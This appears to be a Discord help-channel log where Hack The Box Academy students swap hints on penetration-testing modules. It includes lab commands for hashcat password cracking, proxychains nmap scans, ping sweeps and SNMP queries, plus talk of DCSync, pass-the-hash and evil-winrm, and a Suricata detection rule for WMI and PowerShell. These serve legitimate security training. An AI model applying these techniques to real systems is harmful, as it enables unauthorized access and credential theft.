i think you have to set yourself up through the #welcome channel first and link your account

winged egret
#

Anyone ran into this problem: ./chisel: error while loading shared libraries: libgo.so.42: cannot open shared object file: No such file or directory.
While doing the pivoting with chisel ?

cloud urchin
#

yes, you need to downgrade and use an older version of chisel

winged egret
#

okay thx mate

toxic apex
tiny brook
#

ive got problem loading the page opening the ip adress

winged egret
tiny brook
#

hey?

toxic apex
#

@winged egret yes in go its fairly easy most of the time you get there with CGO_ENABLED=0

winged egret
#

mmm ill keep that in mind thx

cloud urchin
sly nebula
#

"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 2 and could use some nudge. I will share what I have tried so far.

sly nebula
pliant coyote
#

In Password Attack Password Reuse / Default Passwords, I logged into ssh as sam and then used mysql -u -p but I don't know what to do, can anyone give me some tips?

autumn pilot
#

use the concept taught throughout the module

#

don't overcomplicate it

weary goblet
#

Hey all! Not sure what the issue is here. This is the Footprinting, SMB module

#

I made sure no trailing white spaces are there and also tried respawning the machine, but that unfortunately did not help

weary goblet
#

Right, now I understand the issue. I used !cat as it was supposed to be displaying the flag on the samba share, while it was just showing the flag inside the local directory I was running the smbclient from 🙂 thanks

fringe urchin
weary goblet
#

Yep, makes sense now, thank you!

old sandal
#

Hello guys
which is the best job role in the cybersecurity'

fringe urchin
#

Thats just preference. Some ppl prefer jobs more into red teaming, some prefer defending or malware analysis etc.

dim wolf
#

the best is what you like the best

cloud urchin
#

probably owner of the company

dim wolf
#

CISO?

sterile flower
#

I am stuck on suricata skill assessment. I need help on creating the suricata alert using the right keyword: alert tcp any any -> any any (msg:"WMI Execution Detected"; content:"Win32_ProcessStartup"; content:"powershell"; sid:2024233; rev:2;)

lusty hearth
#

did you figure out how to fix this? having the same issue

snow ridge
lusty hearth
#

thanks

rapid sparrow
rapid sparrow
vague pewter
#

@rapid sparrow I see you've done the CDSA and were stuck on the same question as me once; Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe may I bug you about how I might arrive at the solution :3

rapid sparrow
vague pewter
#

So far I've done the steps using velociraptor and downloaded the SANS_TRIAGE Image

#

ohhh :P

rapid sparrow
vague pewter
#

well if you remember even the slightest hint would help :3

dim wolf
#

it's just you and whatever tools you have on the target

#

scroll through the options in velociraptor and choose the ones that seem interesting

vague pewter
dim wolf
#
Answer the questions below through Velociraptor collections that gather artifacts similar to the ones presented in this module.
vague pewter
#

ah I see, I'll try and figure it out

arctic sentinel
#

Hello, anyone completed the "Intro to Assembly Language" module?!

next bronze
vague pewter
arctic sentinel
# next bronze just ask your question

I am kind of stuck in the "find the hex value in 'rax' when we reach the instruction at <_start+16>?" I try to follow the hint but seems I am doind something wrong

rustic sage
next bronze
rustic sage
fathom pendant
arctic sentinel
fathom pendant
#

ssh is brutally slow

marsh fulcrum
fathom pendant
rustic sage
fathom pendant
#

90k is normal, it'll take some time

#

you can use more threads as well

#

48 is most stable

fringe urchin
#

-t 48 does well, took me around 20min to hit the pass

rustic sage
fathom pendant
#

it will take some time, but yes

#

~20 minutes

rustic sage
arctic sentinel
#

and I should step until start+16...

arctic sentinel
#

but I dont have anything in the start+10... no hex value

next bronze
#

there is, look at rax

arctic sentinel
#

Im lost... I dont understand

#

you mean there is an hex value here_

next bronze
#

yes, look at the rax register

#

not the instruction itself

zealous rune
#

that instruction is running an xor on the rax register. you need to look at the contents of the rax register itself

arctic sentinel
#

Im almos there

dim wolf
vague pewter
dim wolf
#

cool

#

i dont have access to my notes rn so sorry i couldnt help further

vague pewter
#

no worries! :))

rustic sage
#

@fathom pendant thank you so much
I got the pass

arctic sentinel
next bronze
#

well again you need to stop at the right instruction

#

read the question carefully and the "Step" paragraph

arctic sentinel
#

got it!!!!!

#

OMG...

#

thanks everyone!! I will have lots of struggles with this module hahahaha

next bronze
arctic sentinel
#

yes... I need to read it many times...

trail flicker
#

could someone please help with this question. Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

#

the rest of the module is super easy

zealous rune
#

deleted

trail flicker
#

but i cant solve the first question its for DNS ENUMERUATION WITH PYTHON

zealous rune
#

have you tried the dig ANY query?

trail flicker
#

yea i can do it again thoguh 1 sec

zealous rune
#

or AXFR?

trail flicker
#

the module hasnt brung up axfr

cloud urchin
#

you'd probably get better answers if you included what module you're working on

trail flicker
#

DNS ENUMERUATION WITH PYHTON MODULE 27

#

its the 1st question in DNS Records and Queries

#

Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

zealous rune
#

what did u do to get all records?

#

for the domain?

cloud urchin
#

we don't know what you're having trouble with so it's hard to answer still

#

you just presented a question in the module... like ok.. do what the module says?

#

or is it something specific?

trail flicker
#

ive used pretty much every command and tried all the answers and all these commandsA IP Version 4 Address records
AAAA IP Version 6 Address records
CNAME Canonical Name records
HINFO Host Information records
ISDN Integrated Services Digital Network records
MX Mail exchanger record
NS Name Server records
PTR Reverse-lookup Pointer records
SOA Start of Authority records
TXT

#

in the txt theirs a HTB flag but its for nothign in the module

slate fiber
#

Hello guys i'm new on that things about hacking and coding, i want to learn... someone can help me? Sorry if i'm ruing the conversation

zealous rune
#

it says submit the one unique record

#

in quotes

compact patrolBOT
zealous rune
#

in all of hte records you get do you see a record that is unique

trail flicker
#

im gonna compile all the records i feel like might be the answer put them in notepad and go from their

acoustic owl
trail flicker
#

iv tried 5+ times

#

the flag idk why its their but its also one of the only thing in quotes

acoustic owl
#

Reload the Academy page in the browser and make sure that there are no spaces at the beginning or end

trail flicker
#

ok il try it again

#

so the txt is the unique record then and its bugged.?

toxic apex
#

Did anyone try the skill assesment of advanced sqlinjections? I feel like there is some minor version change in the postgres somwhere that breaks it

acoustic owl
trail flicker
#

well atleast i know that the flag is the answer and im putting in wrong i guess

fathom pendant
#

try inputting it without quotes

trail flicker
#

wow

#

❤️

#

it worked without the quotes

trail flicker
trail flicker
zealous rune
#

what is the difference between a subdomain and host?

#

because a subdomain can also be a host record

trail flicker
#

i got the answer as of know it was the flag without the quotes

gritty gate
#

Put simply, a host is just a device within the network

zealous rune
#

yep, thx. I guess what i am saying is apart from the name of the subdomain, we don't have a way of telling whether we found a subdomain or a host without trying to enumerate the SOA or other records within the subdomain

fathom pendant
#

it's not easy to tell at a glance

#

because vHost and ip based hosting

zealous rune
#

Apache vhosts

#

?

#

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

question in the DNS Enumeration section in Footprinting module

#

gonna try some different wordlists

#

but still against the subdomain i guess

fathom pendant
#

make sure you have the full list of subdomains from an axfr before attempting the dnsenum tool

zealous rune
#

hmmmm so i can use the dnsenum tool to enumerate hosts in a subdomain that i find

fathom pendant
#

yep

zealous rune
#

but since i don't know which are actual subdomains that contain hosts i should just brute force everything that looks like a subdomain no?

trail flicker
#

Should I start. Introduction to Python 3 or Introduction to Bash Scripting

zealous rune
#

hard to answer, without knowing your objectives

trail flicker
#

Theirs no right answer my objective is to complete everything on hackthebox

#

going through all of level 1 rn

zealous rune
#

@trail flicker start with python3 then why not

trail flicker
#

Bet

zealous rune
#

i think i'm better using a bash for loop to enumerate hosts with dig rather than dnsenum. cos i can't force dnsenum to do just A record lookups

trail flicker
#

Il start the python 3 in a lil gotta couple things to do Thanks 🙂

gritty gate
zealous rune
#

thx

#

i just mention it because the bash loop seems to be more efficient than the dnsenum

#

because we just do a forward lookup each time

#

but dnsenum tryies to do the zone transfer and all that stuff first

fathom pendant
#

Dnsenum is the tool to use

#

The for loop can be helpful, but you can make a for loop with dnsenum to check each subdomain you found though

zealous rune
#

dnsenum in lowercase

fathom pendant
zealous rune
#

yh thanks i was just checking i wasn't using the wrooong tool 🙂

junior oxide
#

in attacking coldfusion i do get a shell and when i type whoami or hostname and get a name and try to submit it i get false answer does anyone know how can i get the answer exactly? is it an error or what?

fathom pendant
buoyant escarp
#

marcie, how do you remember all those modules xD
do you carry your notes with you, even on mobile :D?

#

i forget what i have had for lunch sometimes xD

shut quest
#

Probably has notes on phone

latent glen
#

CPTS is the best course there is full stop

#

the pro lab dante is so so soso fun if youve taken good notes

#

nice mixture between whats known and a bit more thinking outside the box

#

absolutely fantastic. Just wanted to express this

heavy marsh
#

Can someone please explain --no-cast to me for SQLMap?

#

I found this on some github page, but it still makes no sense. What does this have to do with the number of columns?!

#

I feel like this whole SQLMap module is just trial and error on what works with no rhyme or reason.

cloud urchin
#

it instructs the tool not to use any casting function or equivalent mechanism when performing the injection test. the use of casting functions can alert IDS or trigger format-specific errors that can cause the payload delivery to fail.

heavy marsh
#

I understand how the --union-cols=5 works though, because that was mentioned in the module

heavy marsh
cloud urchin
#

casting refers to the use of sql functions to convert data from one type to another

heavy marsh
#

Am I correct in saying the --no-cast switch should be in my bag of "try it if nothing else works"?

heavy marsh
cloud urchin
#

for example, if the SQL injection point is in a numerical context, sqlmap might use casting to ensure that the injected SQL code remains valid and executable by the database server

heavy marsh
#

Is there a good way to find out if it's needed, or just blind trial and error?

heavy marsh
cloud urchin
#

no

heavy marsh
#

What is it trying to accomplish at a database level?

#

Sorry, the module doesn't go into much detail

#

I went back through every section of the module and couldn't find it again. I think it may have been in one of the hints.

cloud urchin
#

sql queries are structed to handle specific data types in different parts of the query, like numeric data is expected in some conditions while strings are expected in others. sqlmap automatically tries to detect and adapt the data type requirements of the query. the no cast option stops sqlmap from trying to adapt the payloads to match the data type requirements of the sql injection points through casting functions.

#

sometimes the automatic casting that sqlmap performs may not work as intended because it misinterprets the data context or because the db handles type conversions in some unusual way

heavy marsh
#

Are you saying that it's taking the --union-cols=5 and using something non-numeric in place of the 5 without using the --no-cast switch?

#

Seems to me like an anomaly.

cloud urchin
#

'why would the command without no cast not work' -- again because sqlmap can misinterpret the data and do things that mess up the query, or the db does something that messes up the query

heavy marsh
#

So it's safe to say use --no-cast on anything where I'm specifying a specific value for a switch then. Makes sense.

cloud urchin
#

yeah if you have precise knowledge of the data type of the column and are confident about your formatting then no cast can simplify it and avoid potential errors due to sqlmap misinterpreting the data

#

really comes down to expirimentation and knowledge of the target

heavy marsh
heavy marsh
buoyant escarp
#

Attacking Common Services, Hard

i have problems forming a working query, what am i doing wrong?

i have impersonated j... in sqlcmd and found the local linked server, now trying to execute commands with the sysadmin privs but i dont get a feedback from my query

#

im using double single quotes

cloud urchin
#

looks right to me, dm me and i'll take a look

cloud urchin
#

<@&861185840277487616>

analog dock
#

<@&861185840277487616>

#

The pathetic thing is he’s typing it himself, it’s not even a bot

#

What an idiot you are

lavish mango
#

<@&861185840277487616> ban this psycho

dim wolf
#

maybe don't say it.

compact patrolBOT
#

A ban with id: 2499 already exists for member acvoaasr1#0

sterile hawk
#

Neato

languid fjord
#

Most of those words shouldve been purged

#

That issue is now fixed

cloud urchin
#

thank you

languid fjord
#

It seems we had every variation of it

#

but not the actual word 😂

#

Sorry for that mess

cloud urchin
#

just some child trying to be edgy on the internet, not your fault

fringe urchin
#

Fk i missed it

cloud urchin
#

be glad you did

buoyant escarp
#

what happened xD?

buoyant escarp
#

as i can remember there are 2 modules that are no longer on the repository when trying to install with pip or apt, it been a minute

shadow ginkgo
#

For anyone else who has any issues connecting to the target via RDP in the Windows Privilege Escalation - Windows Server module; I think this is an issue with the fact that it is a 2k8 box and doesnt like how xfreerdp is interacting with it. I have found there are no issues if you instead use rdesktop (sudo apt install rdesktop) which was built with and used with legacy systems

sleek moss
#

yo what is the bst attack plan tactic is there website where u can see ?

dim wolf
#

we don't offer any hacking services

sleek moss
#

you awnt to get hacked?

#

im joking

#

can someone help i used ssh dynaomic port forwarding and then proxychains nmap and then it says all the hosts are opened for my nmap scan but thats a lie?

dim wolf
#

no one here is going to give you any hacks

sleek moss
#

Completed Parallel DNS resolution of 3 hosts. at 16:19, 0.01s elapsed
Nmap scan report for 172.16.0.0
Host is up (0.078s latency).
Nmap scan report for 172.16.0.1
Host is up (3.1s latency).
Nmap scan report for 172.16.0.2
Host is up (3.1s latency).
why does namp say all the hosts are opened

solid python
#

Opened isn't the right word

#

What is your command

sleek moss
#

proxychains nmap -v -sn 172.16.0.0-2 00

#

i used dynamic port forwarding with ssh

#

Last login: Wed Feb 21 08:13:15 2024
webadmin@inlanefreight:~$ channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host

exotic shadow
#

Hello, is someone here w ysoserial experience? i've been trying to work on something but for some reason ysoserial wont accept the command and deem it something w error w command usage

sleek moss
#

network inet 172.16.5.15 netmask 255.255.0.0 network ip shud be 172.16.0.0 ? dats what i scanned

solid python
#

You should wrap your content in backticks

#

So it formats better

sleek moss
#

ok sorry

solid python
#
nmap
#

What is your question?

sleek moss
#

why doesnt nmap work? it says all hosts up for the full network scan

#

i used dynamic port forwarding ssh 9080 then edited proxychains sock4 9080 then proxychains nmap that cmd and then it scans all and says all online

solid python
#

Those are weird flags for nmapping something when combined with port forwarding

sleek moss
#

why thats what module is

solid python
#

Maybe reset the module and try out the commands again to verify you didn't miss something

sleek moss
#

i c ok danke

graceful mortar
west ledge
#

Now I'm trying to solve the hard lab on password attacks module.I get the password for 'johanna' and I logged in using evil-winrm and transfer the file L****.kdbx into my machine and crack it and get the password, I tried to use this password for user 'david' but It doesn't work, it tells me it's a wrong password, what should I do next ?

#

any help please ?

west ledge
#

I'm stuck here, I got the password for user david , when I'm trying to use these creds with smbclient I got, authentication failure

sleek moss
#

Pivoting, Tunneling, and Port Forwarding

Page 16
Skills Assessment

Skills Assessment
the last device on pivoting wont ever start why

#

the .25

#

i reset that thang like 50 times

#

bruh wtf why wont it work

#

i rdped into the .35 using that username and pw then i do ping sweep and just no new ips

#

the DC ip wont load

#

i get .35 .15 but not .25 why wont this server load

shut quest
sleek moss
#

o danke

west ledge
#

Password Attacks Lab - Hard

I got the password for user Johanna → 1*******!
I logged in using evil-winrm, then download the file L****.kdbx into my pwnbox
I cracked this file and got a password → Q*******
When I’m trying to use this password with user david into smbclient it gives me authentication faliure

I’m stuck here what should I do next ?

shut quest
#

Sometimes you just need to slow down and wait a bit 😉

#

Iirc 15 or 20 is the magic number when you do find it

sleek moss
#

theres two NICs but same network ip do i have to change anything for my ping sweep cmd? for /L %i in (1 1 254) do ping 172.16.10.%i -n 5 -w 100 | find "Reply" ?

sleek moss
#

same network ip and submask yes

#

different NIC ips tho

#

one was like 6.25 otherone was like 10.6 but its within the network 10.16.0.0

#

i dont need to change anything right with the ping sweep since it will jsut use its routing tbale

fathom pendant
#

that PW is for the PW manager

#

that wasn't an invitation to DM me @west ledge

#

you can log into rdp with J*

#

from there it should become clearer

upper ruin
#

Hey, y'all I got a question.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01.
I am currently on MS01, I did the dcsync of the t**ty user and got hashes, when I performed pth though, I am still on MS01 - meaning I did the dcsync wrong in some way as I didn't obtain admin hash for DC01.
Is there a perimeter that I forgot to add?

shut quest
#

Unless my notes are wrong

fathom pendant
#

(which is what you cracked for)

#

you cracked the master pw db password

next bronze
west ledge
upper ruin
fathom pendant
next bronze
fathom pendant
#

there's a password database/manager

west ledge
#

I used keepass2john

shut quest
#

Omg, I overlooked a step, Marcie is correct

fathom pendant
upper ruin
#

I doubt it's in a share, but I will try.

west ledge
primal flint
#

Which area can you ask general HTB academy questions - not specific to a module but pertaining to VPN and accessing the academy from the same machine.

next bronze
#

\\DC01\C$

upper ruin
#

got it

fathom pendant
primal flint
#

Ok I'm asking - I seem to lose access to the academy website content when I start the vpn - I'm guessing its not intended to be use that way? I'd like to cut down the amount of machines I'm cutting and pasting between.

next bronze
# upper ruin got it

I'd recommend practicing your pivoting tho, you'll need it for the next SA anyways

fathom pendant
#

something like this maybe

primal flint
#

I'm using parrot on a VM locally. Is there a way of modifying the VPN that people use?

fathom pendant
#

nope

#

it's just your network settings for w/e reason making the tun0 the default connection even though it shouldn't

fathom pendant
#

the vpn pack is a split-tunnel meaning it shouldn't affect your network traffic

upper ruin
#

I have to re-view how to pivot without SSH.

fathom pendant
#

the article i linked should resolve the issue

primal flint
fathom pendant
#

close enough to lead you to what you need 👍

quasi wave
#

I'm at the point where I have the user tom on htb academy's footprinting hard lab
and I have the username and password I am supposed to log in as:

┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-4d1e3vlqyg]─[~]
└──╼ [★]$ braa backup@10.129.47.90:.*

but its asking me for ser's password and the assignment doesn't say anything about ser
why is this? the username and password I get from the braa scan and 'ser' aren't compatible.

fathom pendant
#

wdym 'ser' it sounds like you're trying to ssh/login incorrectly

viral slate
#

Hey guys!
Currently working on “introduction to digital forensics - rapid triage examination and analysis tools”
Stuck for several days on first question. Can I have some help?

quasi wave
#

I solved problem nevermind

viral slate
dim wolf
#

sorry bro it's bed time

#

just know that the Zone.Identifier data never changes

viral slate
valid viper
#

I'm working on the passwd, shadow, and opasswd section from the password attacks module...

I grabbed the hash from the account under Will's .backup directory, but hashcat isn't cracking it...

hashcat -a 0 -m 1800 hash.txt ~/Documents/Seclists/wordlists/rockyou.txt -o ~/Desktop/cracked.txt

valid viper
#

Any ideas as to what I'm doing wrong?

fathom pendant
#

you don't gotta paste the full hash dude

#

as it's a spoiler still

valid viper
#

I figured maybe someone could double-check it for me. Sorry.

fathom pendant
#

try using the mutated wordlist

valid viper
#

With the hash...?

fathom pendant
#

yes

#

you frequently reuse the mutated wordlist in this module

valid viper
#

They used rockyou.txt in the example.

long flint
#

has anyone done the intro to whitebox pentesting?

fathom pendant
#

in order of checks: it's passwd.list -> mutated_password.list -> rockyou

fathom pendant
#

start with given resources

#

then branch out

valid viper
#

Understood. Thanks.

fathom pendant
#

also by "hashcat isn't cracking it" do you mean it consistently goes to Exhausted?

#

i would double check that no files got corrupted in transfer

#

md5sum file on both ends

valid viper
#

It exhausted with rockyou.txt

#

I'm pretty sure the mutated list will fix it.

fathom pendant
#

but yeah in short

#

always exhaust all resources given

fathom pendant
valid viper
#

I take a lot of notes.

fathom pendant
fathom pendant
# valid viper Will do.

also if you wanna have a mostly easier time: once you get into a linux env check /home/ for users and in a windows env check C:\users (for local)

#

(windows has some other tools though for shaking out passwords)

valid viper
#

Thanks for the advice.

rustic sage
#

Anyone who has cracked the Admin password for Password Attacks Lab - Hard module plz DM me. I'm unsure what to do at this stage since I'm getting multiple passwords from the mutated list

#

Anyone run into issues using crackmapexec for RDP? I've tried a couple cmds and it doesn't connect to the target host

shut quest
#

That wasn't an invite for dm, keep it here, i'm heading off to bed shortly

rustic sage
#

Np

#

i'll push on then

shut quest
#

You dont need the admin pass for that file, there are tools similar to what you have already done

west meteor
#

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer. Any hint for this?
module name: Understanding Log Sources & Investigating with Splunk
Introduction To Splunk & SPL

devout thorn
#

Don't include domain name before user name

west meteor
#

thx

rustic sage
#

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

https://academy.hackthebox.com/module/147/section/1328

I have ssh using sam's credential but what to do next? pls help

cedar void
#

When you try to login into the login form of any website using any form of credentials and you are using Burp Suite to capture you login data, isn't it supposed to return POST data , not GET data?

rustic sage
#

Anyone free to lend a hand with mounting a VHD drive in pwnbox?

#

I've tried a few things and not getting anywhere

jagged zenith
#

Any hint skill ass module injection attacks

next bronze
#

the what injection?

rustic sage
#

skill assessment i guess

tiny reef
#

What the heck is the Password Attacks module.. I´m lucky I got a student subscription, if I paid a thousand bucks a year for Gold and get trolled with stuff like the question on Password Mutations I´d be furious

fathom pendant
#

the question is fine. A lot of times you'll run into last-step questions ¯_(ツ)_/¯

#

Always scan the target first

rustic sage
#

My brain is melting over here with this VHD file

fathom pendant
#

And you'll find a couple links to guides

rustic sage
#

I've read the same ones by the looks, and no bueno

tiny reef
#

I completly understand that people shouldn´t be handheld, because you need to struggle to learn BUT asking misleading questions isn´t the way^^ Imagine I spend 1-2 hours a day next to a full time job and I pay to be educated only to have my time wasted and not respected. Not saying that you should be able to go through the modules in a breeze..

fathom pendant
#

Always enumerate the host before attacking it

#

See what's open

#

Once you saw ssh was painfully slow: look for other services

tiny reef
#

It shows transfer knowledge, for sure. And the next page in the module could have given you the idea to do so. But in a well designed curriculum you should assume the readers past knowledge on which he can build

rustic sage
#

These VHD guides are showing how to decrypt the file once it's already connected. For example, its mountpoint is /sda2 meaning its connected already. In this case it's just a file on disk that hasn't been mounted or connected in any way. And when I try to mount it, i get errors.

fathom pendant
tiny reef
#

But wasted energy to write walls of text here^^ Have a nice day anyway catlurk

fathom pendant
rustic sage
#

But that's what I'm trying to explain, if I cannot mount the VHD file I can't decrypt it

dim wolf
#

as much as the Password Attacks module was annoying, i don't think i ever found it misleading

fathom pendant
#

So you don't have the pw?

rustic sage
#

I do

fathom pendant
#

What mount guide are you using?

rustic sage
#

itsfoss isn't helpful since its part of a dual boot system and already mounted

fathom pendant
dark aspen
#

Hello, can someone help me find a correct answer to the SQLMap Skill Assesment? I'm stuck here for couple of hours, didn't even begin to using sqlmap, I just can't find the correct vector.

#

I also read some user forum and I start to believe there is some unknown issue on my side

cloud urchin
#

i transferred the vhdx file to my main pc and was able to mount it without any issues

#

didn't even bother trying in linux because it was so easy to do in windows

#

you probably don't even need to transfer it and could mount it on the victim system i'd imagine

rustic sage
#

I'm running pwnbox via broswer, I'm guessing you did that through VM?

fathom pendant
rustic sage
#

It sure does

cloud urchin
#

yeah i have a VM

rustic sage
#

👍

fathom pendant
rustic sage
#

I'm sure it is, at this point since it's been so time consuming i'm just trying to move forward with it

fathom pendant
#

The article I linked is the most simple and straightforward way

#

And doesn't make any pre-made assumptions

rustic sage
#

Well nfi why it's not working

fathom pendant
#

Try the steps in the article I linked, the article you linked also mentions using dislocker to unlock

rustic sage
#

I'll try that

#

see how it goes

cloud urchin
#

they changed the streak point system? now on every question i have a "+10 Streak pts" next to it

fathom pendant
#

Or just update questions to reflect

next bronze
#

did they? worked for me yesterday

fathom pendant
#

We're saying questions now reflect giving streak points

next bronze
#

huh

#

they always did

graceful mortar
next bronze
#

oh

#

UI change

cloud urchin
#

the main platform says tomorrow the accounts combine

analog dock
#

Curious how it’ll be done

rustic sage
#

Target ip down for anyone else?

pliant coyote
#

why wrong?

cloud urchin
#

show your command to start the smb server

pliant coyote
fringe urchin
cloud urchin
#

true

fringe urchin
#

It doesnt find it since you aint in the correvt dir

pliant coyote
#

ok

cloud urchin
#

What module?

#

that's the footprinting module

#

have you tried using the list in the resources section?

analog dock
#

Hopefully some evasion soon 😃

cloud urchin
#

yup try that

limber river
rustic sage
#

hello guys
why I am getting error here

pliant coyote
#

what' this?

rustic sage
pliant coyote
#

anybody can help?

limber river